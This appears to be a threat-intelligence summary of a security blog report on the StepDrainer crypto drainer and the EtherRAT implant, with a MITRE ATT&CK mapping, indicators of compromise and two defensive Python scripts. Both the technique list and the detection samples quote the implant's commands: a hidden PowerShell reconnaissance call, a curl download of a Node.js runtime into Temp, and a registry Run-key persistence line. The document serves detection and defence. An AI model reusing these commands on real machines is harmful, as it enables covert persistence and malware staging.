Crypto Drainers as a Converging Threat: Insights into Emerging Hybrid Attack Ecosystems

Crypto‑themed threats and traditional cybercrime infrastructures are converging: credential‑harvesting, loader, and botnet ecosystems are being repurposed to host polished wallet‑phishing pages and drainer tooling that automate multichain asset theft. The report analyzes two cases, StepDrainer (a multichain drainer leveraging Web3Modal and automated stealing methods) and EtherRAT (a hybrid Windows implant delivered via a trojanized Tftpd64 MSI installer), and highlights techniques such as dynamic script injection, obfuscated JavaScript payloads, on‑chain configuration, and persistence via registry Run keys. #StepDrainer #EtherRAT

Key points

  • Drainers and commodity malware ecosystems are converging: infrastructure for credential theft is now reused to host wallet‑phishing content and drainer tooling is being integrated into established malware operations.
  • StepDrainer is a commercialized multichain drainer (sold as MaaS) that targets 20+ networks, automates asset reconnaissance and theft (ETH, tokens, NFTs), and uses Web3Modal to present authentic‑looking wallet modals.
  • Campaign infrastructure uses a lightweight stager API deployed across thousands of domains, Solana on‑chain configuration stores, randomized PHP backends, and heavily obfuscated JavaScript next stages.
  • High‑fidelity social engineering (AI‑themed dashboards, trading portals, compliance UIs) is central to initial access, tricking users into wallet approvals or “top‑ups” (e.g., Solana fee prompts).
  • EtherRAT demonstrates a hybrid model: a trojanized Tftpd64 MSI delivered a bundled Node.js runtime and an obfuscated .dat implant, establishing persistence via HKCU Run and performing host reconnaissance while contacting Ethereum RPC endpoints.
  • Campaigns employ supply‑chain and impersonation tactics (malicious GitHub repos, OpenClaw impersonation, Vercel deep‑links) and use encrypted configuration and obfuscation to evade detection and hinder attribution.
  • The ecosystem’s industrialization (drainer‑as‑a‑service kits, polished marketing, Telegram logging) lowers barriers to entry and expands the pool of actors able to perform stealthy, automated multichain thefts.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Link – high‑fidelity web lures and trading/compliance portals are used as initial access vectors (‘visually refined trading portals that resemble mainstream fintech dashboards’).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – browser‑side drainer logic and injected payloads are implemented in JavaScript (‘"settings.js" script is a browser‑side wallet drainer written in JavaScript using Ethers.js and Web3.js’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell commands are used for silent host reconnaissance (‘powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).Domain"’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – persistence is achieved by adding an HKCU Run key to invoke the Node.js payload at logon (‘reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "6e4653c4b8cf" …’).
  • [T1105] Ingress Tool Transfer – malicious installers and staged downloads deliver implants and runtimes (trojanized MSI and external Node.js retrieval via curl) (‘curl -s -L -o "C:\Users\user\AppData\Local\Temp\Y4M3E93g4Z.zip" "https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip"’).
  • [T1195] Supply Chain Compromise – distribution via a malicious GitHub repository impersonating an official project (‘malicious GitHub repository impersonating the official project and offering downloads for "Tftpd64 v4.74"’).
  • [T1027] Obfuscated Files or Information – payloads and configuration are obfuscated/encrypted to evade detection (‘heavily obfuscated JavaScript payload’ and ‘obfuscated .dat file as the true payload’).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 and campaign routing use web/RPC APIs and HTTP endpoints for Solana and EVM interactions (‘"hXXps://api.mainnet-beta.solana[.]com" "hXXps://rpc.ankr[.]com/solana"’).
  • [T1036] Masquerading – attackers impersonate legitimate projects, wallets, and services to gain trust (impersonation of OpenClaw and legitimate wallet modals: ‘impersonation of OpenClaw’ and Web3Modal branding usage).
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – configuration and staged components are encrypted with symmetric cryptography (AES‑256‑CBC used for encrypted configuration storage: ‘AES‑256‑CBC with bundled keys and IVs’).
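The PowerShell reconnaissance, curl runtime download and HKCU Run key entries quoted above are the host-side behaviours a detection engineer would want rules for. The following is an added example, not code from the report or the LevelBlue/SpiderLabs authors: a small rule set run over constructed process-creation and registry-set events. The event field names (`event`, `image`, `cmdline`, `key`, `value_name`, `value_data`) are an assumed, simplified telemetry schema rather than any real product's format, and the Run value data is constructed to resemble the "conhost.exe invoking node.exe" pattern the report describes.

```python
"""Detection rules for the EtherRAT-style host behaviours quoted in the MITRE mapping.

Added example, not the report's code. Event dicts mimic Sysmon/EDR process-creation
and registry-set records; the field names are an assumed simplified schema.
"""
import re

# Constructed sample telemetry. Commands in events 0-2 mirror the ones quoted in
# the report; the Run value data is constructed to look like conhost.exe
# launching node.exe. Events 3-4 are benign noise to check for false positives.
SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -NoProfile -NonInteractive -WindowStyle Hidden '
                '-Command "(Get-WmiObject Win32_ComputerSystem).Domain"'},
    {"event": "process_create",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": 'curl -s -L -o "C:\\Users\\user\\AppData\\Local\\Temp\\Y4M3E93g4Z.zip" '
                '"https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip"'},
    {"event": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "6e4653c4b8cf",
     "value_data": r'conhost.exe node.exe "C:\Users\user\AppData\Local\CONSTRUCTED.dat"'},
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command Get-Date"},
    {"event": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "OneDrive",
     "value_data": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

# Run value names like "6e4653c4b8cf" are random-looking hex; a weak but useful heuristic.
HEX_VALUE_NAME = re.compile(r"^[0-9a-f]{8,16}$", re.I)


def hidden_powershell_recon(e):
    """Hidden-window PowerShell querying Win32_ComputerSystem (domain reconnaissance)."""
    cmd = e.get("cmdline", "")
    return (e["event"] == "process_create"
            and "powershell" in e.get("image", "").lower()
            and re.search(r"-WindowStyle\s+Hidden", cmd, re.I) is not None
            and re.search(r"Get-WmiObject\s+Win32_ComputerSystem", cmd, re.I) is not None)


def runtime_download_to_temp(e):
    """curl pulling a Node.js distribution archive into the user's Temp directory."""
    cmd = e.get("cmdline", "")
    return (e["event"] == "process_create"
            and re.search(r"\bcurl(\.exe)?\b", cmd, re.I) is not None
            and "nodejs.org/dist/" in cmd.lower()
            and re.search(r"\\AppData\\Local\\Temp\\", cmd, re.I) is not None)


def run_key_conhost_node(e):
    """HKCU Run value whose data launches node.exe through conhost.exe."""
    if e["event"] != "registry_set":
        return False
    key = e.get("key", "").lower()
    data = e.get("value_data", "").lower()
    return key.endswith(r"\currentversion\run") and "conhost.exe" in data and "node.exe" in data


def run_key_random_hex_name(e):
    """HKCU Run value with a random-looking hexadecimal value name."""
    return (e["event"] == "registry_set"
            and e.get("key", "").lower().endswith(r"\currentversion\run")
            and HEX_VALUE_NAME.match(e.get("value_name", "")) is not None)


RULES = {
    "hidden_powershell_domain_recon": hidden_powershell_recon,
    "nodejs_runtime_download_to_temp": runtime_download_to_temp,
    "run_key_conhost_node": run_key_conhost_node,
    "run_key_random_hex_value_name": run_key_random_hex_name,
}


def detect(events):
    """Return (event_index, rule_name) pairs for every rule that fires on each event."""
    hits = []
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, rule_name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}")
```

The two Run-key rules are deliberately separate: the conhost.exe/node.exe pairing is specific to this implant, while the random-hex value name is a broader heuristic that will also surface other commodity persistence and needs tuning against legitimate software in a given environment.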

Indicators of Compromise

  • [Domain] C2/backend and staging infrastructure – 8kwfaa30jtlnwi[.]com, wpuadmin[.]shop, and 3,000+ other malicious domains used as stager/API endpoints.
  • [Solana account] on‑chain configuration store – 8ycauMwVE61B4uWz87B2k2G8mMK7iFjRoBHooaVAcP4k (account used to store campaign domains and referenced in on‑chain transactions).
  • [Smart contract / Ethereum address] on‑chain reference for backend retrieval – 0xe9d5f645f79fa60fca82b4e1d35832e43370feb0 (smart contract address referenced for domain retrieval).
  • [RPC / API endpoints] blockchain and proxy endpoints used by stagers – hXXps://api.mainnet-beta.solana[.]com, hXXps://rpc.ankr[.]com/solana (and other public/private RPC endpoints and Flashbots/Tenderly nodes).
  • [Files / filenames] dropped/staged payloads and scripts – C:\Users\user\AppData\Local\UHpNJrMDHL9sstLd.dat, settings.js, seaport.js (and accompanying .ini/.tmp/.cmd helper files).
  • [Installer / package] trojanized distribution artifacts – trojanized "Tftpd64 v4.74" MSI and ZIP archives retrieved from a malicious GitHub repository.
  • [Registry] persistence entry – HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name "6e4653c4b8cf" pointing to conhost.exe invoking node.exe.
  • [Base64 blobs] embedded initialization/configuration parameters – Base64‑encoded initialData payloads inside Vercel deep‑link parameters and Base64 account data returned by Solana RPC (used to decode campaign domains).
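The last IoC entry describes campaign domains hidden in Base64 blobs, either as an `initialData` deep-link parameter or as account data returned by a Solana RPC node. The following is an added example, not code from the report: a triage helper that takes either a deep-link URL or a raw Base64 string, decodes it leniently (missing padding, URL-safe alphabet), extracts domain-like strings, and defangs them while checking against the two domains the report lists. The `initialData` parameter name comes from the report; the `example-app.vercel.app` host and the JSON layout of the decoded blob are constructed placeholders, since the page does not describe the blob's real structure.

```python
"""Triage Base64-embedded campaign configuration (deep-link parameter or RPC account data).

Added example, not the report's code. The decoded blob layout and the deep-link host
are constructed; only the `initialData` parameter name and the two IoC domains come
from the report.
"""
import base64
import json
import re
from urllib.parse import parse_qs, urlsplit

# Domains listed in the report's IoC section.
KNOWN_BAD = {"8kwfaa30jtlnwi.com", "wpuadmin.shop"}

# Simple hostname matcher: one or more labels followed by an alphabetic TLD.
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]{1,63}\.)+[a-z]{2,24}\b", re.I)

# Constructed sample: a JSON config carrying the report's IoC domains, Base64-encoded
# with the URL-safe alphabet and padding stripped, as a deep link might carry it.
SAMPLE_CONFIG = {"api": "https://8kwfaa30jtlnwi.com/s", "fallback": ["wpuadmin.shop"], "chain": "solana"}
SAMPLE_B64 = base64.urlsafe_b64encode(json.dumps(SAMPLE_CONFIG).encode()).decode().rstrip("=")
SAMPLE_URL = "https://example-app.vercel.app/open?initialData=" + SAMPLE_B64  # host is a placeholder


def b64decode_lenient(s):
    """Decode Base64 that may lack padding or use the URL-safe alphabet."""
    s = s.strip()
    s += "=" * (-len(s) % 4)
    return base64.urlsafe_b64decode(s)


def initial_data_from_url(url):
    """Pull the Base64 initialData parameter out of a deep-link URL, or None if absent."""
    values = parse_qs(urlsplit(url).query).get("initialData")
    return values[0] if values else None


def extract_domains(blob):
    """Return the sorted set of domain-like strings found in a decoded blob."""
    text = blob.decode("utf-8", errors="ignore")
    return sorted({m.group(0).lower() for m in DOMAIN_RE.finditer(text)})


def defang(domain):
    """Render a domain as non-clickable for reports (example.com -> example[.]com)."""
    return domain.replace(".", "[.]")


def triage(url_or_b64, known_bad=KNOWN_BAD):
    """Decode a deep link or raw Base64 string and report defanged domains and IoC matches."""
    raw = initial_data_from_url(url_or_b64) if "://" in url_or_b64 else url_or_b64
    if raw is None:
        return {"domains": [], "matches": []}
    domains = extract_domains(b64decode_lenient(raw))
    matches = [d for d in domains if d in known_bad]
    return {"domains": [defang(d) for d in domains], "matches": [defang(d) for d in matches]}


if __name__ == "__main__":
    print(triage(SAMPLE_URL))
```

The same `triage` function applies to the `data` field a Solana `getAccountInfo` response returns in Base64; only the extraction regex and the IoC list would need adjusting as new domains are published, and anything it surfaces should be treated as a lead for blocking and hunting rather than proof on its own.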


Read more: https://www.levelblue.com/blogs/spiderlabs-blog/crypto-drainers-as-a-converging-threat-insights-into-emerging-hybrid-attack-ecosystems